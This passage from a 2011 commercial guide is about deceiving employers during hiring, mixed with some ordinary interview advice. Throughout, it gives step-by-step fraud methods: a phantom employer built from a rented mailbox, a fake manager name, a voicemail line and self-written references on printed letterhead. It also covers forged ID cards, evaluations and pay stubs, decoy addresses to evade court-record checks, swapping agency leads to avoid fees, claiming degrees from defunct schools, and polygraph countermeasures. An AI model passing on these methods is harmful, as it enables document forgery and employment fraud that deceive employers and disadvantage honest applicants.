+Buy the list and scan the positions. You’ll probably find that the list +is quite long and usually features professional positions for +engineers, physicians or pilots. If you have the technical +qualifications you can select any job that you’re qualified for. +But if you don’t - just keep an eye out for positions for English +language teachers. These positions are usually open to anyone +with a high school diploma. Get the name of the hiring outfit +(usually the agency of a foreign government). Write down the +exact name of the agency, its director’s name and the full foreign +address. +It’s a rare employer who will even attempt to obtain a reference +from a foreign government! My favorite is the government of Saudi +Arabia. They employ thousands of Americans and I’ve never +heard of anyone securing an employment reference from them. +If you’re asked why you’re seeking a position, just tell them that +you’re eager to return to the good old USA due to an illness in the +family. It’s a common and believable story. +Covering up a Misspent Youth +If you’ve had any kind of legal problem in the courts of the county +in which you now live, do not use your current address on a +resume or employment application. Instead use an address in +another county, even an adjacent one will do. +Most companies will not take the time nor spend the money to +check your court records in the first place, but if they do they’ll be +required to pay for the search on a per county basis. For this +reason they will usually restrict their inquiry to your current county +of residence as listed on your application. By appearing to live in a +different county by either moving, using a friends mailing address, +or using the ever-handy commercial mail drop you’ll have them +looking in the wrong place. +A quick and inexpensive way to legally establish a more +convenient new address as your official residence is to register to +vote listing a substitute address as your new address. This will get +you entered into an easily checked public-record database that +any investigator worth his salt will be checking. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 252 - +Reproduction in any form is prohibited without written permission. + +And being a patriotic voting citizen will make you look like a +reasonable and responsible person. (But be aware – this may get +you called up for jury duty!) +Phantom Employer II +If you were either employed by an employer you wish you’d never +worked for or were otherwise not working for a period of less than +four months you can probably get away with simply extending the +employment periods for the previous and subsequent employers +to cover the gap. +But if you have a longer period you need to cover, more drastic +action will be required. There can be many reasons why someone +would have such a gap in their career record. Perhaps they were +ill or were in an alcohol or drug rehab program. Or perhaps they +were staying in a mental health care facility or even serving out a +sentence in a state penitentiary. Whatever the cause of the gap, +we now need to move on to one of our more advanced +techniques. +Under this approach you simply eliminate the unfortunate gap +from your resume entirely and replace it with a widely respected +international firm like IBM, AT&T, IT&T or any other international +company that has an instantly recognizable name. But how are +you going to get this new company to give you an employment +reference? This is where things get really interesting. +First find one of those commercial stores that rent post office +boxes by the month. Rent their smallest box, which should cost +you around ten to twelve bucks a month. +Ask the clerk for the street address for your new box. You won’t +be using the PO box number but will instead show the box number +as a suite number making the mailing address look just like an +everyday office street address. Your new address looks much +more legitimate and professional this way. +Be very careful when filling out the application form for your new +box. List your name and then add two additional names. First add +a common fictitious individual’s name, like “Bill Williams” and then +also add the name of the famous international firm that you will be +claiming as your ex-employer. It should be a household name that +anyone will instantly recognize as a major employer. +If the clerk asks any questions about your “new” old employer, just +tell them that the company is your current employer. They will +readily accept this as many of their customers are traveling +executives who use their boxes for business purposes. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 253 - +Reproduction in any form is prohibited without written permission. + +Then list this new former employer on your resume during the +period you wish to cover. In the future, when you fill out a job +application, list the new company as your employer for that period. +List your Manager’s name as Bill Williams (or whatever name your +came up with) and then go on to list the street address of your +new PO box as the firm’s office mailing address. If you want to go +whole hog on this deception, you could even call the nice people +at the phone company and have them set up a “stand-alone +voicemail” account. +This will give you a dedicated phone number (separate from your +home phone) where you can record a greeting which will include +the name of your new employer. You can either have a friend +record the greeting so as to avoid using your own voice, or you +may be able to choose the default computerized voice if you don’t +want to bother a friend. When they call, you can have a friend call +back and give you a positive reference or fail to respond entirely. +The really nice thing about this approach is that it accomplishes +several different goals at the same time. First you get a very +impressive former employer to list on your resume. Employers +know that large companies can afford to be very picky about who +they hire which tends to impress prospective employers. At the +same time you get to completely erase the offending firm from +your resume. +There are also some other benefits. You get to design your own +work experience which gives you a great deal of latitude in +increasing your stated job skills, job title and you’re also assured a +solid gold employment reference as the request for the reference +will be mailed directly to you! +You’ll be providing your own reference and I just know you’ll be +generous! +When the request for an employment reference arrives in your box +you’ll know that the outfit you interviewed with is seriously +checking you out. You then have two choices. You can go to a +printer, tell them that you work for this large company and ask to +have a small quantity of letterhead stationery printed up. +To avoid any delays, you should have this printing done well in +advance if you plan to return a letterhead reference. You can then +actually respond with a formal reference on yourself. This option +may cost you a few bucks for printing but is the best approach. Or +you can do nothing. The simple fact that the letter was not +returned undelivered will make it look like it was properly received. +In this case no news is not necessarily bad news. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 254 - +Reproduction in any form is prohibited without written permission. + +“Clumping” +This technique can be used to “clump” together several short-term +jobs that may or may not be related to your main career skills +under an umbrella which makes it appear that you were working in +your chosen field throughout the entire period. You can also use a +phantom employer to pass off part time work as full time. +It’s a fact that today many firms simply don’t respond to +employment reference requests on a timely basis. Each letter they +send out costs them money and doesn’t in any way benefit the +firm. And because the lawyers now run the planet, phone +references are no longer a viable option. +There have been so many lawsuits over statements made during +phone references that most personnel departments have an +official policy of banning all discussion of past employees over the +phone. Instead they require that all requests for references be +submitted by mail so that the outgoing reference letters can be +cleared through their legal department. +Whatever you do don’t attempt to cover career gaps by claiming to +have been involved in “consulting”. This ploy was a good one a +few years back but today is an overused and transparent ruse +that’s guaranteed to raise an eyebrow and lead to further +questions. +Stretch, Don’t Invent +When given the choice of either inventing a new qualification or +stretching an existing one, always choose the easier route - +stretching. Let’s say that you want to claim a college degree you +didn’t earn. If you attended a school but didn’t graduate, it’s far +better to claim a degree from that institution than from one you’ve +never even visited. At least you know the school you attended and +can intelligently discuss the campus layout, social life and some of +the instructors. +If you ever bump into someone who attended the same school +you’ll be in a much better position to handle the situation. Imagine +trying to convince a Harvard grad that you too attended Harvard +when you’ve never set foot there? They would see through you +right away and report the conversation which would almost +certainly get you quickly fired. +Also, if you attempt to change fields you won’t know the jargon +and will quickly find yourself in trouble. If you expand your existing +qualifications and stay in the same field you’ll have a much easier +time of it. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 255 - +Reproduction in any form is prohibited without written permission. + +The Creative Use of Spurious Documents +You might want to consider carrying a copy of your old resume +with you to the interview. It should be the resume you used to +obtain your current position. To be believable it should be a +slightly older copy of a typed resume, not a slick laser printed +document. This will help substantiate your work history as few job +seekers bother to have this document at their fingertips. +To help bolster your claim of having worked for a particular +company, you might also have one or two supporting documents +with you. You could use a personal computer to generate a +convincing employee ID card, or go to any of the larger office +supply stores where you can easily purchase fancy certificates like +employee of the month or a training completion certificate. +Perhaps you could look around the web where I’m sure you’ll find +several printers who sell very professional blank certificates. Or +you might want to try my personal favorite, a pad of pre-printed +performance evaluation forms with which you can embellish your +past job performance to your heart’s desire. And you’ll never have +to fear having your deception discovered as performance +evaluations are always confidential and completely unverifiable so +make an ideal way to document past employment. +Here’s a nice touch that’s very professional and guaranteed to +impress even the most jaded hiring manager. Carry a personal +thank you note with you pre-addressed to the interviewer. On your +way out of the building drop it in the mail so that it’s received +promptly the next day. +The More the Merrier +And it’s always a good tactic to apply to as many different +companies as possible. Some companies are less careful than +others. When a company is particularly eager to fill a particular +position, they may hire you on the spot. The entire employment +process will be accelerated and the normal checks ignored. It only +takes one careless firm. +Prospective employers are much less likely to verify past +employment that occurred more than five years back. On these +older positions you can usually get away with exaggerating your +job title or duties as they are less likely to be verified. Job +experience that is not relevant to the job you’re seeking is less +interesting to a prospective employer and is also much less likely +to be verified. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 256 - +Reproduction in any form is prohibited without written permission. + +Also if you choose to utilize a phantom employer, many applicants +have found that they could get away with claiming a non-existent +firm as a former employer provided the position is more than +seven or eight years ago. Phantom employers can also be used to +help them bring outdated job skills more up to date. +Need Personal References? +Most companies will insist that you list two or three personal +references. You should be aware of several common practices. +Many companies employ the rather tricky tactic of calling only the +last reference you provide. Most of us have had a friend or co- +worker call and ask that we provide a reference for them. In return +they will usually offer to provide a reference at some point in the +future. +This practice is so widespread that many hiring executives no +longer bother to check personal references. There’s no way that +they can know for sure whether they’re talking to a genuine +reference or a friend whose just posing as one. +A Short Story +I was once employed by a small manufacturing firm. Eight of us +went into work one Friday morning expecting nothing more than a +usual workday. At around 10 am we were summoned into a +meeting and informed that we were all terminated as of noon! We +were stunned but what happened next really showed me how +meaningless references can be. +All eight of us quickly filed out into the parking lot. We stood there +chatting for ten minutes or so. Then someone pulled out a pen +and a yellow legal pad. He offered to exchange either personal or +employer references with anyone in the group. +He quickly found an accomplice. He said “I’ll be Mr. Ron Mathews +and be your sales manager if you’ll be Mr. John Burns my former +office manager.” Each pair would exchange slips of paper with a +short script as to what they should say (dates of employment, job +title/duties etc.) +A half-hour later each of us drove off with three glowing personal +and a employment reference in our pockets! This little story shows +just how useless both sorts of references can be. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 257 - +Reproduction in any form is prohibited without written permission. + +Telephone Madness +For a small fee the phone company will assign you a phone +number that when called will ring through to any other phone +number you designate. You can have a friend, preferably a +female, answer the phone using the company name and take the +phone number so that the call can be returned. +When asked to provide personal references on an application, +always say - “References to be provided at interview”. Have your +references along with phone numbers and addresses typed up on +a single sheet in your pocket when you march in for the interview. +Employment Agency Madness +If you’ve ever had any dealings with employment agencies you’ll +know that there is very little going on there that is anywhere near +fair. The unscrupulous ones will say that they have little or nothing +for you at this time. +However - If you’d be willing to sign a contract binding you to pay +their outrageous fees (usually a percentage of your first year’s +wage), they will open their super-secret private listing of hot, high +salary jobs that you are, of course, fully qualified for. Just sign on +the dotted line. If you don’t sign, they show you the door. +If you do sign you’ll get a job with an employer of unknown +desirability and will be saddled with heavy payments for anywhere +from several months to a year or more. What a scam they have +going on here. But let’s examine a dirty little strategy for beating +them at their own game. +If you sign the contract, they give you the phone number of a hot +prospective employer. You call and set up an interview. If you’re +hired you have to start paying those enormous fees to the +employment agency. But this is where some folks are tempted to +try and cheat the agency out of their fee. If you accept the job and +then tell the agency that the interview didn’t go well and you found +a job elsewhere, you might think that you’ll get away with not +paying the fee. +But these sharks are way ahead of you. What they do is wait a +month or so and then call the employer and simply ask for you by +name. If the call is put through - you are busted and then they +wave the contract you signed in your face and threaten you with a +nasty law suit if you don’t fork up the entire fee immediately. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 258 - +Reproduction in any form is prohibited without written permission. + +But say that you and a friend approach two different employment +agencies, sign their contracts and then just switch the references +the agencies give you - you can both get nice new jobs and +neither of you will ever have to pay a dime to the agencies that +sent you. If the agencies attempt to call a month later, they’ll come +up blank. Of course this ploy is most probably illegal so be sure to +check with an attorney familiar with laws in your area before giving +it a try. +Instant References! +Here is a slick little tactic that comes from a friend who was once +on the run from a rather vicious cult. If you find yourself in a +strange town and need a full set of quick personal references this +tactic may be just the ticket. Dress up in your best clothes and go +to church next Sunday morning. +Choose the most rabid fundamentalist Baptist church you can find. +When they give the “alter call” stroll down the isle and get down on +your knees. You’ll probably be invited to a “fellowship” meeting +afterward where you can tell them about your sad and sorry life +and how you’ve been saved by their church. +If you sound the least bit genuine, they’ll eat it up. Should they +invite you to any social functions – show up. Agree with everything +they say. In a few short weeks you will be one of them and they +will adore you. Not because of your character but instead because +you believe as they do. You’ll quickly amass more references than +you can ever use and they’ll all be from good solid church people. +Why Not To Fear Background Checks or Employment +References +First of all, background checks cost money. With all the belt +tightening that’s going on, few checks are really comprehensive +while many never get off the ground in the first place. Most +background checks done today are only cursory examinations of a +few databases done by overworked, underpaid and rushed +investigators. +Due to the high cost of performing background checks, many +companies have been forced to cut back on the scope and depth +of their routine checking. They tend to hire investigative firms who +often do some really sloppy work. Each investigation is conducted +according to a checklist. +The investigator then signs off as each particular item is verified. +Because the investigators are so rushed, very few negatives are +being discovered. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 259 - +Reproduction in any form is prohibited without written permission. + +Many managers have clearly lost faith in these investigations and +have resigned themselves to relying instead on the impression the +individual creates during the personal interview. This is what’s +causing the increase in interviewing. +Also several states (Arizona for one) have passed state laws that +forbid employer “blacklisting” of former employees. This makes +providing employment references even more dangerous and +complicated as an ex-employee can always launch a law suit +claiming they were blacklisted. +One helpful tactic is to do some serious research on your target +employer. Spend some time reading up both on the company and +it’s industry. Be able to ask several intelligent questions +concerning the firm’s direction and any recent developments that +would affect it’s business. +Research has shown that less than one percent of applicants take +the time to learn about the firms they apply to. This can be a real +leg-up when you’re in a head-to-head competition with a worthy +adversary. +The Numbers Game +Armed with this information and a little creativity, you can easily +add thousands to your future income. By now you’ll no doubt have +gathered that your former employers will be providing no +information at all regarding your salary history. +Sometimes this fact can be very useful depending on the position +you occupy. Some positions have very well established and easily +identified salary ranges while other fields are much more open +which leaves more room for exaggeration. +For instance, the salary for a high school teacher with a bachelor’s +degree is very easy to determine while pegging the income of an +“administrative assistant” would prove much more difficult. If you +have the latitude, increase your salary around 5-10%. +I’ve know several top headhunters who routinely require that each +applicant they handle swear an oath that they will never – under +any circumstances - discuss salary with a prospective employer. +Even if they pressure you to come up with a figure – don’t. +Instead force them to come up with an offer. Studies have shown +that salary numbers provided by the hiring firms are almost always +higher than those provided by prospects. Excited by the prospect +of getting a job offer, many applicants will cough up a number +that’s well below what the employer may be willing to spend. This +is why hiring firms push prospects so hard! Lose this game and +you may suffer for years and years to come. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 260 - +Reproduction in any form is prohibited without written permission. + +This includes any initial response to an advertised position. Many +ads will ask that you submit your minimum acceptable salary +along with your resume. It’s obvious that they’re fishing for a +bargain. And if the number you provide is the least bit high – +whoosh – you’re instantly screened out! +This is by far the quickest and most reliable way to get yourself +eliminated from consideration. +When submitting your resume, don’t even think of actually giving +them a number. Instead just include a note that the salary will be +discussed during the interview. If your resume and cover letter are +strong enough this ploy should get you into the door. +I have to admit that the first time I heard of this tactic, I was +reluctant but went ahead and agreed to not surrender a number. +Each of three interviews went well and during the first two I was +pressured to come up with a figure. During the final interview they +began to push really hard. The interviewer declared that we would +just sit there glaring until I came up with a number. +With sweat rolling down my collar, I smiled and kept apologizing +and referring him to my headhunter. The next day he came up +with an offer that was $14,000 above the number I had in my +head! You can’t argue with success. +If your last salary was below the norm for the market, you can +always claim a somewhat higher number. If cornered, you can +claim that your former position included an annual bonus, trips or +scheduled overtime. These additional sources of income are +impossible to verify and will also tend to make you sound more +valuable. +One particularly effective means of documenting an inflated past +salary is to carry a copy of your current paycheck stub or W2 +earnings statement with you. Any larger office supply store will be +only too happy to sell you a small package of blank forms that you +can run through any computer printer you might have. +You then throw away the top copies and show your future +employer the bottom one that’s labeled “employee copy”. +Be sure that all your numbers are in line and this ploy will +definitely impress him. Fold and re-fold the thing until it looks as +though it’s been in your wallet for some months. +Always remember that it’s absolutely mandatory that you dress +the part you’re trying to play. If you claim a high salary, you should +dress like someone that would be pulling down those big bucks. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 261 - +Reproduction in any form is prohibited without written permission. + +If you dress like a minimum wage worker and try and fool +someone into thinking you make seventy grand a year, you may +not be taken seriously. Nothing flashy or flamboyant just nice high +quality business clothing. +Unless you’re going after a very high-level position, or one that +deals with a sensitive security issue, you’ll find that most hiring +managers will automatically accept any documentation you +provide at face value. +Unfortunately none of the above applies when you go after a +permanent government job. The government has the resources +and the time to check you out from every angle. With them any +resume deception will eventually be discovered and exposed. +“Do Not Contact My Current Employer” +When filling out a job application, always check the little box that +requests that the prospective employer not request a reference +from your current employer. Even if you’re not, this will make you +appear more valuable as a currently employed prospect will +always be more desirable then one who is unemployed. +Hiring companies just love to think that they’re “stealing” you away +from another firm. Most of the hiring managers we spoke to +revealed that they seldom bother to follow up with an employment +reference with your last employer after you’re on their payroll. +(Though you have to consider this possibility if it’s stated on the +application) +If your resume is relatively sound and only includes some minor +modifications, you can probably land a position with most any firm. +But should your resume contain more fiction than fact, you may +want to restrict your job search to the smaller companies. Small +family owned outfits do the least checking of all. The pay and +benefits may not be the best, but they might be just the ticket if +you need employment fast and have a resume that may not +withstand the scrutiny a larger company with more resources +might apply. +Need More Job Experience? +If you have put in some years in your field but find that employers +want even more experience, you may want to try this little ploy. +Say you worked for your last employer for two years and the +employers are looking for three to five years here is a way to add +some years to your resume in an untraceable manner. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 262 - +Reproduction in any form is prohibited without written permission. + +Leave the employment dates of your last employer unaltered. +(you’ll have to as they can be easily verified with a simple phone +call) Insert another employer before your last one and show that +you worked for them for the additional years you need. +Of course your work there was in the same field so you now have +a total between the two employers of as many years as you like in +your chosen field. If you can, try to add a reference from a firm in +another state that went out of business as this would render that +reference entirely untraceable. Chances are excellent that if your +last employer provides a positive reference, a prospective +employer will be satisfied. +Clean Up Your Credit Rating +You should also know that a prospective employer now has the +legal right to obtain your consumer credit file despite an explicit +ban on such access in the Fair Credit Reporting Act. Once again, +in the absence of a full explanation any negative information that +might surface will most probably cause you to be immediately +eliminated from consideration. +So it’s vital that you obtain and carefully study a copy of your +current credit file. Be very sure to have any erroneous information +removed or corrected well before you start your job hunt. Many job +seekers have found it nearly impossible to obtain employment just +because their credit file contained but a single blemish. Once +again, the larger companies rely on consumer credit reports more +than the smaller outfits. +This credit file thing can really hurt you if you aren’t on top of it. A +few years back I needed to change jobs. My resume was sound +so I had no problem getting promising job interviews. The first few +interviews went very well and resulted in callbacks for second and +even third interviews. +But somehow I never quite got a job offer. Finally after a great +third interview with a large financial service firm, the head of the +division asked me if I’d be home the next night around 8pm. I +knew I had this one in the bag. Finally a good job. +After the interview he asked me to drop by the personnel office on +my way out. There they had me sign a form that authorized them +to do some background checking. I was standing by my phone +eagerly awaiting the call the next night - but it never came. I +decided to take matters into my own hands and called the division +head to find out what had happened. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 263 - +Reproduction in any form is prohibited without written permission. + +He just mumbled that “if you’d been more honest with us, we +would have made you an offer!” He then added “I’m not supposed +to tell you this but you’d better check your credit report”. +I was stunned! Like most people I thought my credit was just fine. I +always made my payments on time and had never had any +problems. +When I got a copy of my TRW credit file I was shocked to discover +that some idiot in Texas who shared my name, was a real dead- +beat. Not only didn’t he pay his bills, he owed the great state of +Texas overdue tax funds which had caused them to place a lien +on some property near Austin. It was all right there in my report +under my name. +I called TRW who, after discovering that this fool had a different +social security number, cooperated by cleaning up my record right +there on the phone. I then went on to get a great job in less than +ten days. The motto is: check that file and be sure it’s clean before +you enter the job market. +And should you find that you have to correct a credit problem in +your file, be sure to check the file again two months later as +erroneous entries have a nauseating habit of re-appearing. +Remember that mail drops will rent you a box entirely through the +mail. You can, in short order; secure a usable street mailing +address anywhere in the world and for a modest cost. +Applicant Testing +Psychological testing of employment applicants is a rather up and +down kind of thing. It tends to go into and then out of fashion very +quickly. Back in the 1980s marketing types convinced employers +that multiple choice pre-employment tests could cheaply and +effectively screen out a wide variety of undesirable job applicants. +Then some studies were done that showed tests to be worthless +and they quickly went out of style. Now, due to the skyrocketing +cost of performing background checks, testing appears to be on +the rise once again. Today salesmen sell these tests on price +(they’re much cheaper than any kind of background check) and +employers find themselves forced to use them. +Before you even think about taking a test you need to know +exactly what kind of applicants the test is meant to screen out. +There are four classes of undesirables they’re looking to avoid. +The test you take will probably have some meaningless filler +questions that won’t effect your score much. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 264 - +Reproduction in any form is prohibited without written permission. + +But when the question deals with the four areas below, be very +careful. +1. Alcoholics +2. Thieves +3. Druggies +4. Crazies +The good news is that after reading this report you’ll be able to +consistently beat the test and come out ahead of your +competition. +The first secret here is not to “play the saint”. Some test takers +conclude that by answering all the questions as though they were +a totally honest saintly person, they’ll waltz right through the thing +and land the job. +But I’m afraid such a simple approach won’t work. These tests +were designed by psychologists so they’re much more +sophisticated than that. They’re way ahead of you here. +If you fake your way through and attempt to give them all the +answers you think they want, you’ll come up short. If you confess +to stealing some small item but consistently deny committing any +major infractions (in any of the four areas mentioned above) you’ll +do much better. +By answering in this way you will appear to be a well-rounded +average employee (which is what employers really want). +Try to take your time in answering questions. They may force you +to complete the test quickly in an attempt to get you to provide +quick, impulsive answers rather than give you the time you need +to think things through carefully. +Take your time and don’t get flustered. If you can, go at it at your +own pace and leave the test unfinished if necessary. +Sprinkle around minor admissions of little problems and moral +failings here and there but always deny the serious things like +admitting to a criminal conviction or admission to a mental hospital +or drug treatment center. +If they ask about what you do with your spare time, always list +activities that are social in nature. Don’t list solitary pursuits like +watching TV or playing computer games. Employers like friendly +sociable people not socially challenged loners. They may ask +some rather personal questions about who you know and their +activities. Try to play it as though all your friends think just as you +do. (you don’t mix with nasty people at all) +© Copyright 2011, Ariza Research, All rights reserved - ABP - 265 - +Reproduction in any form is prohibited without written permission. + +The psychologists that created these test tell the employers that +an applicant who is consistently honest in answering questions +about little things will most likely be a completely and consistently +honest person in every area of their life. +Be careful when asked about your attitude toward employers +though. Never say anything negative about past employers as +they will interpret this as revealing a negative attitude toward all +employers, including them. Such an employee could cause +problems later on down the road and should be avoided. +Never admit to having any kind of minor or major psychological +problem. This is a real touchy area with employers. No one wants +to hire a nut who is going to show up for work some morning with +a loaded machine gun and fire in his eyes. +Always answer no to questions like: +“People are always watching me” +”Others are planning against me” +”I hear voices in my head” +”Someday I’ll get even with all my enemies, you’ll see” +”God is against me” +”I have violent dreams” +Faking an Academic Credential +Recently I was employed by one of the largest manufacturing +firms in the country. So I was delighted when the company +newsletter announced that a particularly capable and friendly co- +worker had been promoted to vice president of one of the +companies larger divisions. +He was one of six such divisional promotions. According to the +newsletter each of the newly promoted men had similar +educational credentials. An undergraduate degree in either +computer science or engineering along with an MBA from one of +those Ivy League schools. Very impressive stuff to be sure. +You can imagine my shock when I read in the Wall Street Journal +some six months later that a routine check triggered by the +promotions had discovered that two of the six did not in fact +possess the MBAs they claimed! One of them had never even +attended college at all! The motto of this little story is: a clever +applicant can fool even the largest and most sophisticated firms. +This is one area where your age can be an asset. The younger +you are, the more intensely prospective employers will focus on +your academic accomplishments. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 266 - +Reproduction in any form is prohibited without written permission. + +But when you get into your late thirties or older your more recent +career accomplishments will become much more important than +your college days way back then. (It’s much harder for a 25 year +old to claim an unearned degree than an experienced 44 year +old.) +Once again I’m forced to say I can’t condone this particular form of +deception. While claiming an academic credential that you haven’t +properly earned may be an enticing idea, placing it in your resume +will leave you in a vulnerable position if at some point in the future +your trick should be uncovered. Personally I couldn’t take that kind +of risk but I’ve known several that have. +Handling the Job Interview +The strange truth about job interviews is that almost every +manager will say that they can pick the best employees at an +interview by “gut instinct”. +But when psychologists do studies they find that even the best +managers often choose the wrong employees. The funny thing is - +no matter how many studies the shrinks crank out - managers still +place great confidence in their ability to sniff out the undesirables +in an interview and continue to make hiring decisions based +almost entirely on the interview. Go figure. +Any particular interview may be either a highly structured event +with questions being asked from a list or much less formal. The +formal interviews are usually much easier to handle and much +less of a hassle for the applicant. The informal ones can be real +inquisitions if you fall into the hands someone who just wants to +play with your mind. And then there are those employers who like +to conduct so-called “stress interviews” where their sole goal is to +get you to sweat and squirm in your seat. +The first rule of interviewing for a job is - always keep it positive. +You may be asked questions designed to get you to say +something nasty about past employers or bosses. Don’t fall for +this obvious trap. No one wants disgruntled employees. You left +your last job because it wasn’t challenging enough or you felt you +wanted a position with more opportunity. +Your last boss may have been a drunken devil-worshipping child +molester but in the interview you’d better dwell on his better traits. +(if you can’t remember any - make some up) +© Copyright 2011, Ariza Research, All rights reserved - ABP - 267 - +Reproduction in any form is prohibited without written permission. + +Be sure to say something nice about past employers also. Never +complain about anything or anyone. Never say that anyone in your +past has ever treated you unfairly. You’ve been very lucky to work +for such fine companies and great bosses. +Be prepared for tricky questions like: “why should I hire you for +this job?” or “well John, tell me all about yourself”. Don’t let +questions like these rattle your cage. Smile and launch right into +the best answer you can come up with even if it sounds a bit +strange. +Be ready to admit that you’re not perfect. You’re a human being +after all. Keeping you composer is much more important than what +you say. Your interviewer will respect you much more if you keep +your cool despite his hammering than if you came in +psychologically and start to stammer and stutter. +If asked if you have any negatives, stop and cast your eyes up to +the ceiling as though you’re giving a lot of thought to your answer +and then say something like “I sometimes get frustrated working +with fellow employees that have a poor attitude toward the +company they work for”. +If you are asked to have lunch or a cup of coffee with a potential +employer at a local restaurant accept the invitation but be careful +here. You may be asked personal lifestyle type questions. And +you may be offered an alcoholic drink with your meal. This is an +obvious trap. Decline the drink and stick with iced tea or a soft +drink. +If it’s lunchtime inform your interviewer that you have another +interview later in the day and will need to be on the road. You’d be +surprised how often an alcoholic will let down his guard and have +a drink in the hopes he’s found a new drinking buddy and at the +same time a new job. Misery loves company. +One last note: Never allow yourself the luxury of getting into an +argument with an interviewer. You may be baited in an attempt to +draw you out. Take a deep breath and keep your cool. +Beating the Polygraph +I’ve mentioned that employers are once again embracing +psychological pre-employment testing for largely financial +reasons. The polygraph is yet another means of saving a buck. +But the polygraph is defective in many different ways (which is +why it’s never been admissible in court as evidence of guilt or +innocence). +© Copyright 2011, Ariza Research, All rights reserved - ABP - 268 - +Reproduction in any form is prohibited without written permission. + +The most basic problem with the polygraph is that though it is +effective in detecting when a subject is under stress it cannot tell if +the stress is the result of deception or just the stress caused by +the question. +A major bank in the Midwest discovers that $10,000 in cash has +vanished from their high-security vault. Detectives are sure it’s an +inside job as only five bank employees had keys and the public +had no access at all. All five emphatically denied any knowledge +of the heist. A polygraph examiner was called in to help identify +the thief. +wOne of the suspects was an older man who had worked for the +bank for almost twenty years. The polygraph examiner comes to +the conclusion that he is the thief and was employing deception in +answering some questions in particular the key question “Did you +steal the missing $10,000?”. He is fired and stripped of his +pension and other benefits though he continues to steadfastly +claim innocence. His apartment was searched but the money was +never recovered. +Three years later one of the other suspects, a young lady comes +forward and confesses to grabbing the cash. It seems she had a +boyfriend who was so addicted to free-basing cocaine that he +threatened to kill her and her infant daughter if she didn’t steal the +money. +Three years later when they were both arrested for possession of +cocaine, she agreed to turn on him and provide evidence in +exchange for immunity from prosecution. +By then the old man had died probably from a broken heart +brought on by the shame he had suffered. Not a pretty story but it +illustrates a point. When the old man was asked the key question +“Did you steal the missing $10,000?” he knew that his pension +and medical benefits were on the line and if he flunked this test, +his life would be destroyed. The extreme stress of the situation he +faced at that very moment was interpreted by the examiner as +evidence of deception. +TIP: If you are ever asked if you are willing to take a polygraph +exam to clear yourself from some charge, immediately agree to a +test. But insist that the only way you’ll agree to the test is if the +entire thing is arranged by your attorney. (Polygraph examiners +are often biased in favor of those who pay their bill) +You should also remember that the polygraph is often used as a +tool of intimidation. A suspect is placed in a room, the examiner +comes in and while he sets up his machine he chats with the +subject and comments that his machine will quickly get to the truth +as it can’t be fooled and has never failed. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 269 - +Reproduction in any form is prohibited without written permission. + +Many subjects will confess right there and then before they’re +even hooked up to the machine! Companies know that the +polygraph is a great tool of intimidation and use it in exactly that +manner. +The examiner may show you a list of questions he will ask. He +may say “these are the only questions I will ask”. Then right in the +middle of the test he will ask several questions that were not on +the list. He’s just trying to get you upset. +You will be watched carefully before and during the test. Some +examiners believe that they can learn as much or more from your +behavior than they can from their machine. +During a typical pre-employment test you’ll first be asked a series +of simple no-stress questions. You may be asked to verify your +name, address, place of birth, age etc... At this point the examiner +is establishing a “baseline” set of readings. +If you want to confuse him, you could purposely confuse a reading +on any particular question by biting your tongue. Slightly part your +teeth just enough so that you can push a little of your tongue +between your teeth, then bite down on your tongue just a little bit. +You don’t have to draw blood or cause yourself great pain. Just a +little discomfort will send his tracings into high gear. You can get a +similar response by curling your toes in your shoes (so they hurt a +bit) or tightening the muscles in your thighs or buttocks at the right +moment. Be very careful that your tactics aren’t obvious. If the +examiner is experienced he may notice the tongue biting trick. +When you’re asked a key question, try to answer it in the way you +desire while thinking of some far off relaxing scene. Perhaps you +remember sitting on a cruise ship or a white sand beach with the +warm sun beating down on your body. Practice this before your +test. The polygraph is built on the idea that you can’t separate +your words and thoughts but the average person can with a little +practice. +Bookstores can sell you professionally produced relaxation or +meditation tapes that will allow you to develop the skill of instantly +causing your body to relax. +If you answer one of the less important questions in an untruthful +way, you will confuse his results when he compares that result +with the response you had to a major question. If he accuses you +of doing something to confuse his test act surprised. Stay cool and +don’t get emotional. Ask him to repeat any questions. Be +cooperative. Any sign of a negative attitude will be interpreted as +proof that you are employing deception. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 270 - +Reproduction in any form is prohibited without written permission. + +Be polite and respectful even though this whole thing is closer to +voodoo than science. Never show any disrespect to the examiner +or his box. Don’t question the technology even though you now +know it’s far from infallible. +Here’s a tactic a reader provided that worked for him and I thought +I would pass it along. Our friend went in for his pre-employment +polygraph but was very afraid of the question concerning drug use +(our friend is a more than occasional consumer of weed). In his +wallet he carried a crumpled newspaper clipping about the death +of a young man his age who died of a drug overdose. +Sure enough the examiner went through the list of questions and +then asked the two drug questions a second time. Our friend +dropped his head down and mumbled “I was afraid of this”. He +told the examiner that a dear friend of his had died from a drug +overdose and that he got very emotional when ever anyone +discussed drugs. +He then pulled out the clipping and showed it to the examiner. It +worked - he got the job. I told you the machine can’t determine the +source of the stress, just its presence. +The Unverifiable College Degree +When a university goes under the usual practice is to locate +another nearby school that will accept and maintain the failed +school’s academic records so that proper verifications can be +provided for the alumni. Unfortunately (or fortunately for us) some +institutions fail and are never heard from again. +This leaves their former graduates in the uncomfortable position of +having worked hard to earn an academic credential that cannot be +verified by any means. Bad luck for them, but it can be an open +door for any one who wants to claim a degree without having to go +through the bother and expense of actually doing the work. +Here is an interesting little list. It contains information on some +institutions of higher learning that are no longer in business. +Warning: claiming a degree in this way could leave you with a +ticking time bomb in your resume. Also, most of these schools +were not properly accredited though some did sincerely attempt to +provide honest educational services. But if you’re leaving your old +life behind but need an established educational qualification, +claiming a unverifiable degree from one of these belly-up +universities might be just the ticket but there are risks involved. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 271 - +Reproduction in any form is prohibited without written permission. + +Institution Name Location +The information listed here was derived from sources that are +believed to be accurate. The author assumes no +responsibility for it’s accuracy or validity. Always verify +information before use. The reader uses this information at +their own risk. 